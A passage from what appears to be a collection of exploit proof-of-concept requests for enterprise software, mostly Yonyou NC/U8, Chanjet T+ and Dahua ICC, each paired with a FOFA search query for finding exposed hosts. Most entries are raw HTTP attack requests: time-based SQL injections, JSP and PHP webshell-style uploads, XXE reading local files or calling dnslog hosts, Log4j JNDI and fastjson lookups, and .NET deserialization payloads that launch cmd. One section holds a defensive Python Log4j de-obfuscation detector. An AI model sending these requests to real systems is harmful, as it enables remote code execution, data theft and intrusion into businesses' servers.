Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}
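Entry 22 sends a plain ${jndi:ldap://...} lookup, which any substring match catches; real traffic usually hides it behind nested Log4j lookups such as ${lower:j}, ${::-j} or ${env:X:-j}. The Python below is an added example, not the page's code and not Log4j's: it expands innermost lookups repeatedly, implementing only lower, upper and the :-default syntax (every other prefix is treated as undefined and yields its default or nothing, an assumption that is enough for detection but not a full Log4j implementation), and reports the JNDI target once the expansion reveals one. The sample bodies are constructed in the shape of entry 22; the obfuscations are the widely published variants.

```python
import re

# One innermost lookup: '${' ... '}' with no nested '${' inside.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def eval_lookup(inner):
    """Evaluate a single innermost Log4j-style lookup.
    Only what de-obfuscation needs is implemented: lower, upper and the ':-default'
    fallback. Any other prefix (env, sys, date, ...) is treated as undefined, so it
    yields its default or an empty string. Assumption for detection, not Log4j itself."""
    body, has_default, default = inner.partition(":-")
    prefix, _, key = body.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    return default if has_default else ""


def resolve(text, max_passes=20):
    """Expand lookups inside-out and collect JNDI targets.
    Returns (expanded_text, [targets]); a jndi: lookup is recorded, never expanded."""
    targets = []

    def substitute(match):
        inner = match.group(1)
        if inner.lower().startswith("jndi:"):
            targets.append(inner[len("jndi:"):])
            return "<JNDI-LOOKUP>"
        return eval_lookup(inner)

    for _ in range(max_passes):
        expanded = LOOKUP.sub(substitute, text)
        if expanded == text:          # nothing left to expand
            break
        text = expanded
    return text, targets


# Constructed request bodies in the shape of entry 22; the host names are placeholders.
SAMPLES = {
    "plain": '{"loginName":"${jndi:ldap://dnslog}"}',
    "lower": '{"loginName":"${${lower:j}ndi:${lower:L}dap://dnslog/a}"}',
    "empty_default": '{"loginName":"${${::-j}${::-n}${::-d}${::-i}:rmi://dnslog/b}"}',
    "env_default": '{"loginName":"${${env:NOT_SET:-j}ndi:dns://dnslog/c}"}',
    "benign_lookup": '{"loginName":"${env:USER}"}',
    "benign": '{"loginName":"alice"}',
}


def scan_samples():
    """Map each sample to the JNDI targets found in it (empty list means clean)."""
    return {name: resolve(body)[1] for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, found in scan_samples().items():
        print(f"{name:14s} {found or 'clean'}")
```

Run this over request bodies, headers and any other field that ends up in a log statement; the decision should be made on the expanded text, never on the raw bytes.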

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
Same probe as entry 21, with the dnslog host left as a placeholder.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
The fname field carries the destination path, so the upload body is written as a JSP under the web root; request the resulting .jsp afterwards and look for the marker string in the response.
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
 <soapenv:Header/>
 <soapenv:Body>
 <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
 </ser:getUserNameById>
 </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
 "storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
   "StartInfo":{
    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
   }
  }
 }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following interface:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
 "storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
   "StartInfo": {
    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
   }
  }
 }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, which the export handler runs as-is.

61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
